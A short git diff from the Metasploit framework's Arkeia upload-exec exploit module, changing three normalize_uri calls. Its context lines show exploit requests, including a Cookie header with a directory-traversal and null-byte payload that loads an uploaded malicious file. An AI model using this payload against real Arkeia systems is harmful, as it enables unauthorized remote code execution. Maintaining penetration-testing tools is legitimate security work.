diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 2ab4ac44f2..ad26ae9c83 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(uri, "") + 'uri' => normalize_uri(uri) }) if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/ @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'GET', 'headers' => { 'Cookie' => "lang=fr" }, - 'uri' => normalize_uri(uri, "") + 'uri' => normalize_uri(uri) }) if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/ @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'GET', 'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" }, - 'uri' => normalize_uri(uri, "") + 'uri' => normalize_uri(uri) }) # If we don't get a 200 when we request our malicious payload, we suspect